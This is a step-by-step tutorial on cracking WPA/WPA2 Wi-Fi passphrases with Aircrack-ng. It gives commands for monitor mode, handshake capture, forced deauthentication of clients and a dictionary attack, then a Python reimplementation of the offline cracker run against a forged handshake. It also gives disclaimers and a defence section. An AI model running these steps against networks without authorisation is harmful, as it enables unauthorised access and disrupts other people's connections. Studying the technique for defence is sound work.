
Wi-Fi Password Cracking

TL;DR

This guide walks through recovering a WPA/WPA2-PSK Wi-Fi password with the Aircrack-ng suite: capture the 4-way handshake between a client and the access point, then run an offline dictionary attack against it. Warning: Attempting to crack passwords without permission is illegal and unethical. This information is for educational purposes only, specifically to understand cyber security vulnerabilities and improve your own network protection.

Prerequisites

  • A Linux distribution (Kali Linux is recommended).
  • A wireless adapter that supports monitor mode and packet injection.
  • Basic command-line knowledge.

Step 1: Put Your Wireless Adapter into Monitor Mode

Monitor mode lets your wireless adapter capture every 802.11 frame on the channel, not just the packets addressed to it; without it you cannot see other clients’ handshakes.

  1. Identify your wireless interface name (e.g., wlan0):
    iwconfig

  2. Stop processes such as NetworkManager and wpa_supplicant that would keep changing channels or reset the adapter (this disconnects you from any Wi-Fi network until you restart them):
    sudo airmon-ng check kill

  3. Start monitor mode:
    sudo airmon-ng start wlan0

    (replace ‘wlan0’ with your interface name). This usually creates a new interface such as wlan0mon; some drivers keep the original name instead, so use whatever interface name airmon-ng prints in the following steps.

Step 2: Capture Wi-Fi Traffic

You need to capture the WPA/WPA2 4-way handshake (the EAPOL key frames) exchanged when a client connects to the access point. Only those frames contain the values needed to test passphrases offline, so a network with no client joining during the capture yields nothing to crack.

  1. List nearby networks:
    sudo airodump-ng wlan0mon

    (replace ‘wlan0mon’ with your monitor mode interface). This displays nearby Wi-Fi networks in the upper table and the clients associated with them in the lower one.

  2. Identify the target network’s BSSID and channel number.
  3. Lock the capture onto that network and write it to disk:
    sudo airodump-ng -c [channel] --bssid [BSSID] -w [output_file] wlan0mon

    Replace ‘[channel]’ with the target’s channel, ‘[BSSID]’ with its MAC address, and ‘[output_file]’ with a filename prefix (e.g., capture). Captured packets are saved to files named ‘capture-01.cap’, etc., with a .csv listing the networks and clients seen written alongside. Leave this running.

  4. To speed up the handshake capture, deauthenticate a connected client from a second terminal so that it reconnects and performs the handshake again:
    sudo aireplay-ng -0 1 -a [BSSID] -c [client_MAC] wlan0mon

    Replace ‘[client_MAC]’ with the MAC address of a connected device (from the lower table of the airodump-ng output). You only need to do this once or twice; stop as soon as ‘WPA handshake: [BSSID]’ appears in the top-right corner of the airodump-ng window. Two caveats: a client must actually be connected, since a deauthentication with nobody to kick off achieves nothing, and clients on networks using 802.11w (Protected Management Frames) ignore forged deauthentication frames altogether.

Step 3: Crack the Password

Now you’ll use a wordlist and a cracking tool to attempt to find the password. This is an offline dictionary attack: for each candidate, Aircrack-ng derives the keys that passphrase would produce and checks them against the captured handshake, so nothing further is sent to the target network.

  1. Download a wordlist (e.g., rockyou.txt; Kali ships it compressed at /usr/share/wordlists/rockyou.txt.gz). These are large files; ensure you have enough storage space.
  2. Use Aircrack-ng to crack the handshake:
    aircrack-ng -w [wordlist_path] [capture_file].cap

    Replace ‘[wordlist_path]’ with the path to your wordlist and ‘[capture_file].cap’ with the name of your capture file (e.g., capture-01.cap). If the file holds several networks, Aircrack-ng asks which one to attack; add -b [BSSID] to select the target non-interactively. Running Aircrack-ng on the file without a wordlist first lists each network and how many handshakes it found, which is the quickest way to confirm that Step 2 succeeded.

  3. Aircrack-ng tests each passphrase from the wordlist against the captured handshake (WPA/WPA2 stretch the passphrase with 4096 rounds of PBKDF2-HMAC-SHA1, which is what makes every guess slow). If a candidate matches, it displays ‘KEY FOUND!’ with the password; if the list is exhausted, the passphrase simply was not in it.

Important Considerations

  • Wordlist Quality: This is a dictionary attack, not an exhaustive search, so it only succeeds if the passphrase is in your wordlist. Entries shorter than 8 or longer than 63 characters cannot be WPA passphrases and are wasted space.
  • Time: Cracking can take anywhere from minutes to years, depending on password complexity and hardware. Because of the 4096 PBKDF2 rounds per guess, a CPU manages only thousands of guesses per second; GPUs are far faster, but a long random passphrase still puts the search beyond reach.
  • Defence: The counter-measures follow directly from the attack: use a long, random passphrase that appears in no wordlist; prefer WPA3 (SAE), whose handshake does not permit offline guessing; and enable 802.11w (Protected Management Frames) so that forged deauthentication frames are rejected.
  • Legal Implications: As stated before, cracking Wi-Fi passwords without permission is illegal. This guide is for educational purposes only.
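
What Aircrack-ng actually checks in Step 3, and why the Wordlist Quality and Time notes above hold, as an added example written for this page (it is not code from the original post or from the Aircrack-ng project). It uses only the Python standard library. Per candidate it derives the PMK with PBKDF2-HMAC-SHA1 (4096 rounds), expands it to the PTK with the two MAC addresses and two nonces from the handshake, and compares the MIC of EAPOL message 2 computed under the KCK with the one that was captured. The “capture” is forged inside the block from a known passphrase so that the example runs offline; the SSID, MAC addresses, nonces and wordlist are all constructed, as is the minimal EAPOL frame layout.

```python
# Added example, not from the original post. The handshake below is forged
# from a known passphrase; SSID, MACs, nonces and wordlist are constructed.
import hashlib
import hmac
import time
from dataclasses import dataclass
from typing import Iterable, Optional

MIC_OFFSET = 81  # EAPOL header (4) + key-descriptor fields before Key MIC (77)


@dataclass(frozen=True)
class Handshake:
    """What an offline attack needs from a captured 4-way handshake."""
    ssid: str
    ap_mac: bytes      # authenticator address, 6 bytes
    client_mac: bytes  # supplicant address, 6 bytes
    anonce: bytes      # 32-byte nonce from message 1
    snonce: bytes      # 32-byte nonce from message 2
    eapol: bytes       # complete EAPOL-Key frame of message 2
    mic: bytes         # the 16-byte MIC carried in that frame


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); the
    rounds (~8192 SHA-1 calls per guess) are what make cracking slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(PMK, label || 0x00 || data || i), i = 0..3."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with its MIC
    field zeroed, truncated to 16 bytes. The KCK is the first 16 bytes of the PTK."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def check_passphrase(hs: Handshake, candidate: str) -> bool:
    ptk = derive_ptk(derive_pmk(candidate, hs.ssid), hs.ap_mac, hs.client_mac,
                     hs.anonce, hs.snonce)
    return hmac.compare_digest(eapol_mic(ptk[:16], hs.eapol), hs.mic)


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: the first candidate whose MIC matches, else None.
    Entries outside 8..63 characters cannot be WPA passphrases and are skipped."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if 8 <= len(word) <= 63 and check_passphrase(hs, word):
            return word
    return None


def build_message2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal WPA2 EAPOL-Key message 2 (constructed; real ones carry RSN IE key data)."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2 (HMAC-SHA1), pairwise, MIC
            + b"\x00\x10"                # key length
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce + b"\x00" * 32      # key nonce, then zeroed IV (16), RSC (8), ID (8)
            + mic + b"\x00\x00")         # key MIC, key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, EAPOL-Key


def make_sample_capture(passphrase: str, ssid: str = "HomeLab") -> Handshake:
    """Forge a handshake for a known passphrase so the attack has a target.
    All values are made up; a real capture supplies them from capture-01.cap."""
    ap_mac, client_mac = bytes.fromhex("aabbccddee01"), bytes.fromhex("112233445566")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    ptk = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], build_message2(snonce))
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce, build_message2(snonce, mic), mic)


def guesses_per_second(hs: Handshake, samples: int = 20) -> float:
    """Rough single-core rate; divide the wordlist size by it for a time estimate."""
    start = time.perf_counter()
    for i in range(samples):
        check_passphrase(hs, f"benchmark-{i:04d}")
    return samples / (time.perf_counter() - start)


SAMPLE_WORDLIST = ["123456", "password", "letmein1", "correct-horse-battery", "qwerty123"]

if __name__ == "__main__":
    hs = make_sample_capture("correct-horse-battery")
    print("KEY FOUND:", crack(hs, SAMPLE_WORDLIST))
    rate = guesses_per_second(hs)
    print(f"~{rate:.0f} guesses/s here; ~14 million rockyou.txt lines would take "
          f"~{14e6 / rate / 3600:.1f} h, 26**10 random lowercase letters "
          f"~{26**10 / rate / 3600 / 24 / 365:.0f} years")
```

The skip of entries outside 8 to 63 characters is the Wordlist Quality point in code: “123456” is never even derived. The benchmark is the Time point: the rate you see from pure Python is a few hundred guesses per second, Aircrack-ng on a CPU a few thousand, and either way the 26^10 estimate shows why a random passphrase of modest length is out of reach of this attack no matter how good the wordlist is.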